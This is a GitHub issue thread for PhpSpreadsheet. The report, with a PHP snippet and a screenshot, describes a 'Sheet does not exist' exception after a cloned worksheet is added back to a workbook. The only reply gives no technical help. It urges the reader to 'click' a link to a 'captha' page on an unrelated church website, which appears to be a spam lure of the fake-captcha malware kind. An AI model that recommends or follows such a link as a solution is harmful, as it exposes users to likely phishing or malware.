### ISSUE TITLE
Exception 'PhpOffice\PhpSpreadsheet\Exception' with message 'Sheet does not exist.'  

### ISSUE THREAD

**Issue by xjcallen** [PHPOffice/PhpSpreadsheet#4192]
$excel = IOFactory::load("abc.xlsx");
$sheet1 = clone $excel->getSheet(0);
$sheet1->setCellValue('A1','1111111111111');
$excel->addSheet($sheet1);

![企业微信截图_20241016200007](https://github.com/user-attachments/assets/e96753ef-9a51-41bf-8188-4b012e733301)

**Comment by nltheme** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
